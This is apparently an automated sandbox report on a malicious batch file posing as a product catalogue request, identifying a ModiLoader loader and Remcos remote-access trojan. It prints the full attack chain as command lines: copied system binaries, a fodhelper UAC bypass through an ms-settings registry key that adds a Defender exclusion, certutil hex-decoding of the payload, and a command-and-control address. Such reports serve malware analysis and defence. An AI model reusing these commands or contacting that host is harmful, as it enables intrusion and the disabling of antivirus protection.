Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
04-04-2024 07:08
Static task
static1
Behavioral task
behavioral1
Sample
PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Resource
win10v2004-20240226-en
General
-
Target
PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
-
Size
4.4MB
-
MD5
a9f2c8cc828e683395e9a804c120021e
-
SHA1
6b1f7e910df1792b94690045d3de345cff297ff3
-
SHA256
c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1
-
SHA512
c0e6d23b0ba6bc4255938d8b14b563100068e25ab2d9c5e5e9632683c6b1bd28f8fc32b4f2b790400b66977b24f0ff574b2025a7fdee7e968c08d975ff1c227d
-
SSDEEP
49152:xOp5wZlcwP4QJpMoD8cGL2tojFdpjyPHKbfS4b0umx0TwKi3K6lflLE/B2t3mTss:0
Malware Config
Extracted
remcos
RemoteHost
192.3.216.139:44800
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-EP05ZF
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5096-56-0x00000000040C0000-0x00000000050C0000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
xkn.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation xkn.exe -
Executes dropped EXE 16 IoCs
Processes:
alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 3336 alpha.exe 4176 alpha.exe 408 alpha.exe 4900 xkn.exe 4968 alpha.exe 4032 alpha.exe 4392 kn.exe 3800 alpha.exe 5084 kn.exe 5096 Lewxa.com 5052 alpha.exe 3332 alpha.exe 4320 alpha.exe 4628 alpha.exe 3296 alpha.exe 4276 alpha.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1688 taskkill.exe 384 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " reg.exe Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings reg.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xkn.exepid process 4900 xkn.exe 4900 xkn.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
xkn.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 4900 xkn.exe Token: SeDebugPrivilege 1688 taskkill.exe Token: SeDebugPrivilege 384 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Lewxa.compid process 5096 Lewxa.com -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Lewxa.compid process 5096 Lewxa.com -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exealpha.exedescription pid process target process PID 3728 wrote to memory of 2836 3728 cmd.exe cmd.exe PID 3728 wrote to memory of 2836 3728 cmd.exe cmd.exe PID 2836 wrote to memory of 4528 2836 cmd.exe extrac32.exe PID 2836 wrote to memory of 4528 2836 cmd.exe extrac32.exe PID 3728 wrote to memory of 3336 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 3336 3728 cmd.exe alpha.exe PID 3336 wrote to memory of 2908 3336 alpha.exe extrac32.exe PID 3336 wrote to memory of 2908 3336 alpha.exe extrac32.exe PID 3728 wrote to memory of 4176 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 4176 3728 cmd.exe alpha.exe PID 4176 wrote to memory of 4824 4176 alpha.exe extrac32.exe PID 4176 wrote to memory of 4824 4176 alpha.exe extrac32.exe PID 3728 wrote to memory of 408 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 408 3728 cmd.exe alpha.exe PID 408 wrote to memory of 4900 408 alpha.exe xkn.exe PID 408 wrote to memory of 4900 408 alpha.exe xkn.exe PID 4900 wrote to memory of 4968 4900 xkn.exe alpha.exe PID 4900 wrote to memory of 4968 4900 xkn.exe alpha.exe PID 4968 wrote to memory of 5028 4968 alpha.exe reg.exe PID 4968 wrote to memory of 5028 4968 alpha.exe reg.exe PID 4900 wrote to memory of 2656 4900 xkn.exe fodhelper.exe PID 4900 wrote to memory of 2656 4900 xkn.exe fodhelper.exe PID 3728 wrote to memory of 4032 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 4032 3728 cmd.exe alpha.exe PID 4032 wrote to memory of 4392 4032 alpha.exe kn.exe PID 4032 wrote to memory of 4392 4032 alpha.exe kn.exe PID 3728 wrote to memory of 3800 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 3800 3728 cmd.exe alpha.exe PID 3800 wrote to memory of 5084 3800 alpha.exe kn.exe PID 3800 wrote to memory of 5084 3800 alpha.exe kn.exe PID 3728 wrote to memory of 5096 3728 cmd.exe Lewxa.com PID 3728 wrote to memory of 5096 3728 cmd.exe Lewxa.com PID 3728 wrote to memory of 5096 3728 cmd.exe Lewxa.com PID 3728 wrote to memory of 5052 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 5052 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 3332 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 3332 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 4320 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 4320 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 4628 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 4628 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 3296 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 3296 3728 cmd.exe alpha.exe PID 3296 wrote to memory of 1688 3296 alpha.exe taskkill.exe PID 3296 wrote to memory of 1688 3296 alpha.exe taskkill.exe PID 3728 wrote to memory of 4276 3728 cmd.exe alpha.exe PID 3728 wrote to memory of 4276 3728 cmd.exe alpha.exe PID 4276 wrote to memory of 384 4276 alpha.exe taskkill.exe PID 4276 wrote to memory of 384 4276 alpha.exe taskkill.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\fodhelper.exe"C:\Windows\system32\fodhelper.exe"4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pydormqv.52z.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Lewxa.txtFilesize
3.1MB
MD5aecbd8ff910c38b1772994a46cf4dcee
SHA196e1b7e276e7b19150c259a344e45b9fa04fac43
SHA256f29aff3e41afb8bdc6aeffbb4dc0f0083a7851a4fae1ef39a44bf72d7ede6c33
SHA5122919015e969612462b2d5b91e1bfa4ec92277f065628e3b5fc6126974203bd490ab89809f14951ac0a5e9d888dbde98af1ebb3900318fa6d718fd04e89d36d18
-
C:\Users\Public\Libraries\Lewxa.comFilesize
1.5MB
MD56babecb95e226aef5eef6f80111e04de
SHA1f2974245b3391f9be136fdf76df36cc5ad0bed2d
SHA256a561b2ad4fea4284042c99132d49d651f3d409cc41dc6e950dc85a16ae3934a0
SHA512109d9814b12c61c9579395317dc54a6a0092b3ec1b54d4eab9c3489ffe11971e977f8676f44886e46299bbbf49407e33e02642a0ec151144a3dc72b1a13e0949
-
C:\Users\Public\alpha.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\kn.exeFilesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Users\Public\xkn.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/4900-17-0x0000026F6DD00000-0x0000026F6DD22000-memory.dmpFilesize
136KB
-
memory/4900-27-0x00007FFDCE690000-0x00007FFDCF151000-memory.dmpFilesize
10.8MB
-
memory/4900-29-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmpFilesize
64KB
-
memory/4900-28-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmpFilesize
64KB
-
memory/4900-32-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmpFilesize
64KB
-
memory/4900-35-0x00007FFDCE690000-0x00007FFDCF151000-memory.dmpFilesize
10.8MB
-
memory/5096-56-0x00000000040C0000-0x00000000050C0000-memory.dmpFilesize
16.0MB
-
memory/5096-66-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-48-0x0000000000A90000-0x0000000000A91000-memory.dmpFilesize
4KB
-
memory/5096-60-0x0000000000400000-0x0000000000596000-memory.dmpFilesize
1.6MB
-
memory/5096-61-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-62-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-63-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-64-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-65-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-53-0x00000000040C0000-0x00000000050C0000-memory.dmpFilesize
16.0MB
-
memory/5096-69-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-71-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-74-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-75-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-80-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-84-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-90-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB
-
memory/5096-91-0x0000000016220000-0x0000000017220000-memory.dmpFilesize
16.0MB